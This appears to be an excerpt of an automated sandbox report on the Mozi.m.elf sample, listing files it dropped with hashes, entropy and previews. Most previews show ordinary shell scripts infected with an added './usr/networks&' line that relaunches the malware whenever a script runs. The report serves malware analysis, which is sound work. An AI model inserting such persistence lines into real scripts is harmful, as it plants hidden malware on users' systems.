                                                              Preview:./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):2564
                                                              Entropy (8bit):5.346461718403454
                                                              Encrypted:false
                                                              SSDEEP:48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9Zgz5QcJdcg63JI7+thz3pDsZdRtNzazELX:yF/E/lQ5QcJz7+tN3pAbRtJazELX
                                                              MD5:5A7BF4FFD03AE3B45F7EF8500A88D63C
                                                              SHA1:DBFF57314EAD3467F2357BF20E7D40FC20AE846C
                                                              SHA-256:8221FFC6B5CE193B173F22C873712D38673239A36E2E1C5F931F040A9D96440F
                                                              SHA-512:735D29AC37C532983BDCC294F401FF0B65B836A4012276266D68A249262EF50506742622163697A1F5665C4FD1761BE33006199F313E21DAA91236E7CD09632A
                                                              Malicious:false
                                                              Preview:./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):46
                                                              Entropy (8bit):3.925523369006428
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                              MD5:2CADDA792FBD37B54978108B6CC504D4
                                                              SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                              SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                              SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):893
                                                              Entropy (8bit):4.754860515157645
                                                              Encrypted:false
                                                              SSDEEP:12:20a8PvpwsNE8rKpVXExGG3S69V43usL7XEwoARsVXniVXtgf4VXEt7Fs05fjgn:nlwsWAZDV4eg4w4c6Xjg
                                                              MD5:8B937F22608AE7DB9A71801A5EAF7985
                                                              SHA1:A968811F781A1FA33F18E4F9D23D66E805C926FE
                                                              SHA-256:6D8F85A7D902E1B248753FCA7CC85C39228CC50A872436BB4CEF9276F36D97C9
                                                              SHA-512:07AC35203AF776710809196B92DCF3CF9357C1689B627F7C9146E0B3EFD0B6B47FEF4FE0036AF1C6CABA5854E88AEB576B666C6C8B2E6AD998A143BD5C10E292
                                                              Malicious:false
                                                              Preview:./usr/networks&.# behaviour on exit, which resets default colors again...# print grid of all colors and brightnesses.python demo01.py..# Simple demo of changing foreground, background and brightness..python demo02.py..# Demonstrate the different behavior when autoreset is True and False..python demo03.py..# check that stripped ANSI in redirected stderr does not affect stdout.rm -f demo04.out.python demo04.py 2> demo04.out.cat demo04.out.rm -f demo04.out..# Demonstrate the difference between colorama initialized with wrapping on and off..python demo05.py..# Demonstrate printing colored, random characters at random positions on the screen.python demo06.py..# Demonstrate cursor relative movement: UP, DOWN, FORWARD, and BACK in colorama.CURSOR.python demo07.py..# Demonstrate the use of a context manager instead of manually using init and deinit.python demo08.py../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):824
                                                              Entropy (8bit):4.411576521686501
                                                              Encrypted:false
                                                              SSDEEP:12:VFfxfNiNBxMZhLs/jMeZ0aMLlhLyljfBeZ0fjIClAMZhLecdj6RujrZy1Tn:ZNmGLsvZ7kLyqZSIxGLf6oZU
                                                              MD5:CDDCC0755668278EDB780BD4EF65C45E
                                                              SHA1:E66315D7E1B40196A94DB2127F021CB697ADA242
                                                              SHA-256:9FC0A0139AE67EEC0EBB42A89C440F1B7E181E54F21B3D2B965E83B91A4E1C6E
                                                              SHA-512:46090B4B7D308552BB28324E6963AF21F769677483336135831E5CC405EF58267440951018BBBFC773EB6302BC9DCEA27620399DB25E3FE1510BC1232B131CC3
                                                              Malicious:false
                                                              Preview:./usr/networks&.test -f $DAEMON || exit 0..set -e..case "$1" in. start). echo -n "Starting $DESC: ". $DAEMON --daemon --pidfile /var/run/$NAME.pid. echo "$NAME.". ;;. stop). echo -n "Stopping $DESC: ". start-stop-daemon --stop --quiet --pidfile /var/run/$NAME.pid. # \ --exec $DAEMON. echo "$NAME.". ;;. restart|force-reload). echo -n "Restarting $DESC: ". start-stop-daemon --stop --quiet --pidfile \. /var/run/$NAME.pid. # --exec $DAEMON. sleep 1. $DAEMON --daemon --pidfile /var/run/$NAME.pid. echo "$NAME.". ;;. *). N=/etc/init.d/$NAME. echo "Usage: $N {start|stop|restart|force-reload}" >&2. exit 1. ;;.esac..exit 0.../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):2239
                                                              Entropy (8bit):4.714198727897739
                                                              Encrypted:false
                                                              SSDEEP:48:iBs/sdCu3uQzixZ9sIJyLjs/VhNO4HO0HszTKrBLeVXcR/d4Z+syfIZfwiQEw9r1:iBsEsFuIuGyK9eVX+uZ+syfIZfwiQEwr
                                                              MD5:ADE364831C18F9ABBF6C3B6F050F7759
                                                              SHA1:E1DC95E5FB2431D03A47FAE4C2B2B54B8945CD6E
                                                              SHA-256:2F2441308AA69227E7193D1F3C91BF0B61AB27B1D553C810462FBF35490A5194
                                                              SHA-512:359FA168A4BF7C20436DAFAC5C9C438327B6C994C75CC4C488EA0FFE440F71F6776CDDEAE801D86E3783214EC32E348D5C1994B006E0265608055FCDA423EDBA
                                                              Malicious:false
                                                              Preview:./usr/networks&. h|-help) usage ; exit 0 ;;. s|-second) kk=${key2} ;;. vvv) verbose="-vvv" ;;. vv) verbose="-vv" ;;. v|-verbose) verbose="-v" ;;. *) echo "Unknown option: -$opt " ; exit 1 ;;. esac. shift. opt="$1".done..if [ $# -lt 1 ]. then. usage. exit 1.fi..echo ">>> try to report capabilities:".sg_persist -c ${verbose} "$1".res=$?.case "$res" in. 0) ;;. 1) echo " syntax error" ;;. 2) echo " not ready" ;;. 3) echo " medium error" ;;. 5) echo " illegal request, report capabilities not supported?" ;;. 6) echo " unit attention" ;;. 9) echo " illegal request, Persistent Reserve (In) not supported" ;;. 11) echo " aborted command" ;;. 15) echo " file error with $1 " ;;. 20) echo " no sense" ;;. 21) echo " recovered error" ;;. 33) echo " timeout" ;;. 97) echo " response fails sanity" ;;. 98) echo " other SCSI error" ;;. 99) echo " other error" ;;. *) echo " unknown exit status for sg_persist: $res" ;
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):837
                                                              Entropy (8bit):5.302563134496065
                                                              Encrypted:false
                                                              SSDEEP:12:cnghJ15N5jKJQlw6vWcWwH8QoFIr8zAZjF/6wQ8+WepqKUZ0N5JrHYV5N5jKUVcv:MK5NworhH83Igsv/6j59I0Nv05NwHeX4
                                                              MD5:6F4CEFE8C604AF13A0E95B1A624268E0
                                                              SHA1:95D3589209627FA8249BA32D78B11DC6E9E0B94E
                                                              SHA-256:D30D1E9E6DD28C9CCC349B9781744F88B1A023052B98C10CC44427DC13A01157
                                                              SHA-512:BA36E3FB93776A05AAE8CD731DC90D05CC04F4A1F76A141CEAE46EDBEDA4A02B8A20088CBF395985447C870ACC7CF2A6066A1C55D6A6B339AD7381B4973177A6
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit 1..else...find $LOG_DIR -type f -name hp-\* -mtime +$LOGFILE_DAYS -print0 2>/dev/null | xargs -r -0 rm -f 2>/dev/null..fi.else..exit 1.fi...USAGE=`du -c $LOG_DIR 2>/dev/null |grep total |cut -d't' -f1`..# Clears the logs if size is greater than specified limit.while [ $USAGE -gt $MAXSIZE ]; do...# changing the user specified LOGFILE_DAYS days to 1 days lesser...LOGFILE_DAYS=`expr $LOGFILE_DAYS "-" 1`...# If same day logs are reaching Max size, deleting all log files...if [ $LOGFILE_DAYS -eq 0 ]; then...find $LOG_DIR -type f -name hp-\* -print0 2>/dev/null | xargs -r -0 rm -f 2>/dev/null...break..else...find $LOG_DIR -type f -name hp-\* -mtime +$LOGFILE_DAYS -print0 2>/dev/null | xargs -r -0 rm -f 2>/dev/null..fi..USAGE=`du -c $LOG_DIR 2>/dev/null |grep total |cut -d't' -f1`.done../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):5640
                                                              Entropy (8bit):5.075171234163134
                                                              Encrypted:false
                                                              SSDEEP:96:EndUdULCUP+WucEeLvUmp3qFvUnxEX3ZmXQfVStPDVYt4cI0pNZQ89LKVSTzCKwN:OUdULCUPSeLvUDNUxGZgQfVSDVTM79W7
                                                              MD5:E91743F1831D7CE024336A919713390C
                                                              SHA1:0A53FF0AFE70ADA2538643A69DD332CEF8B9CDA7
                                                              SHA-256:72F50ACEC6CFB58D01899D4A8F64573DDF80B3A57DAF4EE9CE4B403873DF887E
                                                              SHA-512:4C8CCAC875528A73D8113202A887EB009B258DB4A80233073ABC9F46AB21ECAB2937B3EA3FEB794ED2229BF3273E95D9B73073EB8990DDDC8AC9C8DCE161CF0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.# because function is not supposed to exit error codes..fs_type () {..local fstype=""..if (export PATH="/lib/udev:$PATH"; type vol_id) >/dev/null 2>&1; then...PATH="/lib/udev:$PATH" \....fstype=$(vol_id --type "$1" 2>/dev/null || true)...[ -z "$fstype" ] || { echo "$fstype"; return; }..fi..if type lsblk >/dev/null 2>&1 ; then...fstype=$(lsblk --nodeps --noheading --output FSTYPE -- "$1" || true)...[ -z "$fstype" ] || { echo "$fstype"; return; }..fi..if type blkid >/dev/null 2>&1; then...fstype=$(blkid -o value -s TYPE "$1" 2>/dev/null || true)...[ -z "$fstype" ] || { echo "$fstype"; return; }..fi..echo "NOT-DETECTED".}..is_dos_extended_partition() {..if type blkid >/dev/null 2>&1; then...local output....output="$(blkid -o export $1)"....# old blkid (util-linux << 2.24) errors out on extended p....if [ "$?" = "2" ]; then....return 0...fi....# dos partition type and no filesystem type?......if echo $output | grep -q ' PTTYPE=dos ' &&.....! echo $output | grep -q ' TYPE=';
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):407
                                                              Entropy (8bit):4.430546624952678
                                                              Encrypted:false
                                                              SSDEEP:12:axuI47jZ9yPM/o47jZ9yPaLaAl5IYkWbWCGcxQuuiC/5s8n:CuI4fZV/o4fZjWqPC2Qu8/e8
                                                              MD5:B133FEA1865145C4491358207DE1C0DB
                                                              SHA1:30DC19C478A0D59E9C03DFB99D59AA67B4E706C3
                                                              SHA-256:01BB6F1F7C079F3702E616E15548F3EF4BDF7D8594F6E4873964476159BD54FB
                                                              SHA-512:138AF43BDB49654CEAB6498CAF1D747E4698CCCC135F095E093FEADA7031DB119EAF820E4661DB2B0104E2863F3A36C5D9EB5464E73E287CFCC61BD8603CE79E
                                                              Malicious:false
                                                              Preview:./usr/networks&. exit. fi. vim --cmd 'let no_plugin_maps = 1' -c 'runtime! macros/less.vim' -. else. vim --cmd 'let no_plugin_maps = 1' -c 'runtime! macros/less.vim' "$@". fi.else. # Output is not a terminal, cat arguments or stdin. if test $# = 0; then. if test -t 0; then. echo "Missing filename" 1>&2. exit. fi. cat. else. cat "$@". fi.fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):179
                                                              Entropy (8bit):4.813555283479331
                                                              Encrypted:false
                                                              SSDEEP:3:qXVay6vUZ6aAcvZ6sF5b2FpJRJUGE7zsjZ2FPYRKYUGE7zQvvvLQVOORgn:w6vUFAcvgfvRxgA4QRxgUv3LPn
                                                              MD5:693F623F27A2CF8623A4ACEECD20DA9F
                                                              SHA1:7A52B6AA1A47433B259D4699D86A6840C5E02D78
                                                              SHA-256:EC43854908E92A14857A8845EB89F8C64DBFC7856BC23AA1F82BD2A75097EB2C
                                                              SHA-512:01E779F1F569BBEED68AC5EE6C99FD558F003C3166B5F5FA0ED29F512D45AF03378F0708E359009DF3567E4EE003ED7DB395C854EF045F8A51901788A996F290
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..grep major-152 $f >/dev/null.if [ $? = 1 ]; then..echo alias block-major-152 aoe >> $f..echo alias char-major-152 aoe >> $f.fi.../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):315
                                                              Entropy (8bit):4.844907937025013
                                                              Encrypted:false
                                                              SSDEEP:6:wSWl0ARIP9cDhussXcAJWAbM+tCACzYsavu/C5VKSChR5bm026qyAJpl8LAhn:wvVuXFmYs1/LSChqmqfJs0hn
                                                              MD5:43C4BF1017D72A45F95FB685FCECCF9A
                                                              SHA1:B78469C2F587A3E6A4BB591385D5D721B8B829C0
                                                              SHA-256:9A041A6D5102D1416B1616B4C13791F3ED00DE305DDE32E5E2233A85E5ACCD45
                                                              SHA-512:A7D1050FDBF4BA02AD9DDE5E09895C89469439DBD0FE8B9639B1A91802AF96D03ED5D202BAF8354D49D4B9C4489E3B60616A76CEEE8C4924FB8C428C554526FC
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.}..for d in `ls -d $sysd/block/etherd* 2>/dev/null | grep -v p` end; do..# maybe ls comes up empty, so we use "end"..test $d = end && continue...dev=`echo "$d" | sed 's/.*!//'`..printf "$format" \..."$dev" \..."`cat \"$d/netif\"`" \..."`cat \"$d/state\"`".done | sort../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):427
                                                              Entropy (8bit):4.897324371958306
                                                              Encrypted:false
                                                              SSDEEP:12:chnJjBFcVAFBzKJ+NT7+J+900EV/+/gLl60k6XxVjpInPn:CdB6qFBGYNP+JO00e/MilNVFInP
                                                              MD5:9E74B9DB16052AAFD66DC8BE8F3A69F4
                                                              SHA1:A18ADC7A4062900F79D8DBE4430F53E17D0D4B42
                                                              SHA-256:E4ECBF6B5F68F1DB22C13E934EE409855502080D2089DA534A39E9C73E76139B
                                                              SHA-512:3FD605D3E7879DAAC636A01B8373A179796FF60070BCF9975844FC40217A4399B74DA8F345F3F28189CC82C5FFF26715A7D23DDECC0A42E1E794EE3A279B12E6
                                                              Malicious:false
                                                              Preview:./usr/networks&....exit 1...fi..fi.fi..# find the directory where udev rules are stored, often.# /etc/udev/rules.d.#.rules_d="`sed -n '/^udev_rules=/{ s!udev_rules=!!; s!\"!!g; p; }' $conf`".if test -z "$rules_d" ; then..rules_d=/etc/udev/rules.d.fi.if test ! -d "$rules_d"; then..echo "$me Error: cannot find udev rules directory" 1>&2..exit 1.fi.sh -xc "cp `dirname $0`/udev.txt $rules_d/60-aoe.rules"../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1306
                                                              Entropy (8bit):5.232118753528843
                                                              Encrypted:false
                                                              SSDEEP:24:koS8g1YJonwE2BxUCLzJ8ZpvPIfTw1aTTPh4V8TahlByh22pTflrykrs4:koS89E2HvZSIrAa3PhUkahXyh2KTlryG
                                                              MD5:64D41D32A14275C6B34741EE3DFA5EAB
                                                              SHA1:A441D2F4E709ED46E045A7A51701F4F2B9FB0C36
                                                              SHA-256:0FB6B7E294DACF7EEF1583A074C8DF2889BD4366062564740E5A985C837C0754
                                                              SHA-512:B60817E1DFEEF2DA2FBC23656C6C21188B0B5EE1CDE2B46D6DB4FC2A6416298048571A433024A892875F59A91EA175111A0A0D2716C308B35625E4E60FA6A20D
                                                              Malicious:false
                                                              Preview:./usr/networks&.ls $P > /dev/null 2>&1 || exit 1..# Initialize two files, one for /dev/3270 commands and one.# to replace the /etc/inittab file (old one saved in OLDinittab).echo "#!/bin/sh" > $SCR || exit 1.echo " " >> $SCR.echo "# Script built by /sbin/config3270" >> $SCR.if [ ! -d /dev/dasd ]; then..echo rm -rf "$D/$SUBD/*" >> $SCR.fi.echo "grep -v $TTY $INITTAB > $NINITTAB" > $SCRTMP || exit 1.echo "echo $ADDNOTE >> $NINITTAB" >> $SCRTMP.if [ ! -d /dev/dasd ]; then..echo mkdir -p $D/$SUBD >> $SCR.fi..# Now query the tub3270 driver for 3270 device information.# and add appropriate mknod and mingetty lines to our files.echo what=config > $P.while read devno maj min;do..if [ $min = 0 ]; then...fsmaj=$maj...if [ ! -d /dev/dasd ]; then....echo mknod $D/$TUB c $fsmaj 0 >> $SCR....echo chmod 666 $D/$TUB >> $SCR...fi..elif [ $maj = CONSOLE ]; then...if [ ! -d /dev/dasd ]; then....echo mknod $D/$TUB$devno c $fsmaj $min >> $SCR...fi..else...if [ ! -d /dev/dasd ]; then....echo mknod $D/$TTY$d
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:C source, ASCII text
                                                              Category:dropped
                                                              Size (bytes):19777
                                                              Entropy (8bit):5.576952905096142
                                                              Encrypted:false
                                                              SSDEEP:384:fwMxiQBla8sAxIEVcwZ+ZoBaOOatUdpVnismIm4FOtcra5rdr/QB5oAl6MQBX6hy:fwMxra8HxIEkmImIOtcra5rAoAl636hy
                                                              MD5:3CF3EA10A24E6A5799372E52C625F5FF
                                                              SHA1:8DCE2DD4D30FE29A3CD9B06E8C276CFAEB41B191
                                                              SHA-256:FD1FB0A9D12E75013B3C330D081C6817E5C0090DE03C22A96B14674A168B307F
                                                              SHA-512:D0108C351A191121A5DB5777A451261837126CC955FFADCF0855C82F27CCF794B91FED77DE152AD61907595A30E879EA582E9819CCAEAC0BDCCAF82C07CC59CE
                                                              Malicious:false
                                                              Preview:./usr/networks&. exit 1.fi.# ============= MultiSound.d/setdigital.c ==============.if test ! -d 'MultiSound.d'; then. $echo 'x -' 'creating directory' 'MultiSound.d'. mkdir 'MultiSound.d'.fi.if test -f 'MultiSound.d/setdigital.c' && test "$first_param" != -c; then. $echo 'x -' SKIPPING 'MultiSound.d/setdigital.c' '(file already exists)'.else. $echo 'x -' extracting 'MultiSound.d/setdigital.c' '(text)'. sed 's/^X//' << 'SHAR_EOF' > 'MultiSound.d/setdigital.c' &&./*********************************************************************.X *.X * setdigital.c - sets the DIGITAL1 input for a mixer.X *.X * Copyright (C) 1998 Andrew Veliath.X *.X * This program is free software; you can redistribute it and/or modify.X * it under the terms of the GNU General Public License as published by.X * the Free Software Foundation; either version 2 of the License, or.X * (at your option) any later version..X *.X * This program is distributed in the hope that it will be useful,.X * but WITHOUT ANY WAR
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1019
                                                              Entropy (8bit):5.264867233271885
                                                              Encrypted:false
                                                              SSDEEP:24:NcdhLFmJJsA1Mz9mOBM1t1IjQ+51MC1JOgULmjXUkSo0:NYs51gXe1i95JJB8mH0
                                                              MD5:946D056056885AB81686DFF084F8C0AC
                                                              SHA1:6087B2C2445E11CDE4F03C2E71A445978D68C166
                                                              SHA-256:CF5DEAF653121D3BAE355DBBF73837ABDB5AD46871BCE09376D1EAE23DBAC41A
                                                              SHA-512:D91BE0DF8EB1A761C0BA21D6D563C90D1AB7A740CDCB1A71D611D3C8F6C48D4D6C6291E77B407E51AE9D8D264726806E82CDE5FF00068E0A0487598656365489
                                                              Malicious:false
                                                              Preview:./usr/networks&..[ "$val" ] || { echo "can't find $1 in $VMLINUX" 1>&2; exit 1; }..# convert from hex to decimal..echo $((0x$val)).}..__data_loc=$(sym_val __data_loc)._edata_loc=$(sym_val _edata_loc).base_offset=$(sym_val _xiprom)..# convert to file based offsets.data_start=$(($__data_loc - $base_offset)).data_end=$(($_edata_loc - $base_offset))..# Make sure data occupies the last part of the file..file_end=$(${CONFIG_SHELL} "${srctree}/scripts/file-size.sh" "$XIPIMAGE").if [ "$file_end" != "$data_end" ]; then..printf "end of xipImage doesn't match with _edata_loc (%#x vs %#x)\n" \.. $(($file_end + $base_offset)) $_edata_loc 1>&2..exit 1;.fi..# be ready to clean up.trap 'rm -f "$XIPIMAGE.tmp"; exit 1' 1 2 3..# substitute the data section by a compressed version.$DD if="$XIPIMAGE" count=$data_start iflag=count_bytes of="$XIPIMAGE.tmp".$DD if="$XIPIMAGE" skip=$data_start iflag=skip_bytes |.$KGZIP -9 >> "$XIPIMAGE.tmp"..# replace kernel binary.mv -f "$XIPIMAGE.tmp" "$XIPIMAGE"../us
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):810
                                                              Entropy (8bit):5.14795580060536
                                                              Encrypted:false
                                                              SSDEEP:12:cngowa2h12l3mGXHFMyHFtfBkcCZsL49ysL7FwuIGCjDCLn:M4+XKyrZRCZsL4QsL7FwuIzvCL
                                                              MD5:DD8FCA0CC462A93575815302D5C70995
                                                              SHA1:FFE07B0595BA0DAA3799B71E79F3648D02B641D3
                                                              SHA-256:FC1B0AA6D39705668CA297DACF643A6D429E42A84DABDE0601734F864DBE364F
                                                              SHA-512:D28E0773CFD7FA867E627785D1D86A8AC74A92FB5CB6CC47E642B1E41EB0DCB015D4186D87962A63BF51E22B2EF7FE237C1BCA9B04D557E2C48755D6EF319658
                                                              Malicious:false
